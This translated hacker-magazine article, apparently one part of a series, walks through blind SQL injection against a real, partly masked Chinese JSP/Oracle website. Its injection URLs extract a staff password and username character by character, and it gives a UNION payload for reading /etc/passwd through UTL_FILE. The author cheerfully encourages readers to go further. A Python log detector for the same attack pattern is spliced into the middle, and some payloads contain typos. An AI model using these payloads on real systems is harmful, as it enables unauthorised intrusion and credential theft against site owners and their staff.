Travel of the JSP+Oracle SQL Injection(2)
  Add date: 07/24/2008   Publishing date: 07/24/2008   Hits: 256
Figure 3

The process above is very tedious and killed a lot of brain cells; it feels much the same as guessing against Access. If only Oracle had a method like MSSQL's for directly exposing the database and table names, that would be great. Ha-ha. What comes next, of course, is getting the user name and the password. Come on! First, see what the smallest STAFF_ID value is:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797' and 1= (select min(STAFF_ID) from T_PASSWD) and '1 ' = ' 1

The page returns normally. Ha-ha, no need to be polite: this is our target, so get its password first. The good show is about to begin; it really makes me want to watch the animation from "Hacker Empire" (The Matrix):

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797' and 0 (select conut(*) from T_PASSWD where substr(PASSWORD,1,1)='1' and STAFF_ID=1) and '1 ' = ' 1

Of course, you can also use the ASCII() function to guess. Many predecessors have already covered this, so I will not explain it here, otherwise the editor will say I am padding the article to collect the fee, ha-ha. In less than 10 minutes of guessing the password came out: "19791108", probably a birthday. A password without a user name is no good, but what follows is much simpler:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797' and 0 (select conut(*) from T_PASSWD where substr(STS,1,1)='1' and STAFF_ID='T') and '1 ' = ' 1

Take it slowly. The steps are much the same as above: check the length first, then guess the characters one by one. The guessing took a bit longer this time; after 25 minutes I finally had the account: "TANGBIN". The injection process is officially concluded!
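Seen from the server side, the character-by-character guessing described above leaves a recognizable trail in the access log: one client sends the same numeric parameter with a subquery appended and walks the substr() position upward. The detector below is an added example, not part of the original article; the log format, the client addresses and the helper names are assumptions, and the sample log is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" \d{3}$')   # assumed log format
SUBQUERY = re.compile(r"\(\s*select\b|\bunion\s+select\b", re.I)
SUBSTR = re.compile(r"\bsubstr\s*\(\s*\w+\s*,\s*(\d+)\s*,\s*\d+\s*\)", re.I)
NUMERIC_ID = re.compile(r"\d{1,18}")

def build_sample_log():
    """Constructed log: one normal reader, one client probing position by position."""
    base = "/viewBulletin.do?type=C&bulletin_id=200404010797"
    lines = [f'198.51.100.7 "GET {base} HTTP/1.1" 200']
    for pos in (1, 2, 3):
        for guess in "01":
            probe = (f"'%20and%201=(select%20count(*)%20from%20T_PASSWD%20where%20"
                     f"substr(PASSWORD,{pos},1)='{guess}'%20and%20STAFF_ID=1)"
                     f"%20and%20'1'='1")
            lines.append(f'203.0.113.9 "GET {base}{probe} HTTP/1.1" 200')
    return "\n".join(lines)

def analyze(log_text, param="bulletin_id", min_positions=2):
    """Report every client whose `param` value is not a plain number."""
    seen = defaultdict(lambda: {"requests": 0, "signals": set(), "positions": set()})
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        client, target = m.groups()
        for value in parse_qs(urlsplit(target).query).get(param, []):
            if NUMERIC_ID.fullmatch(value):
                continue  # expected shape of the id: digits only
            rep = seen[client]
            rep["requests"] += 1
            rep["signals"].add("non_numeric_id")
            if SUBQUERY.search(value):
                rep["signals"].add("subquery")
            rep["positions"].update(int(p) for p in SUBSTR.findall(value))
    for rep in seen.values():
        # Several distinct substr() offsets from one client means data is being read out.
        rep["blind_extraction"] = len(rep["positions"]) >= min_positions
    return dict(seen)

if __name__ == "__main__":
    for client, rep in analyze(build_sample_log()).items():
        print(client, rep)
```

The digits-only check in `analyze` is the same rule the application should enforce on `bulletin_id` before the value reaches a query, together with bind variables instead of string concatenation.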

Finally, a few additional points. If UTL_FILE is open to the PUBLIC group, it may be possible to read files on the server; if it is misconfigured, any file can be obtained, for example /etc/passwd. It must be used together with UNION, for example: union select 'hoge', '. /. /. /. /. /etc/passwd', '1', '1', '1' from SOMETABLE--. As for UNION queries, angel's article on PHP injection in issue seven of "Black Against" already covers them in detail: the preceding clause must be given a false condition so that the result of the following query is returned. Of course, you can also try UPDATE, INSERT, cross-database queries and so on; if you want to know the answer, try it yourself! I believe "Black Against" will publish such an article in the near future. And if you have any good methods or material, remember to share them with me.
 
 
 


 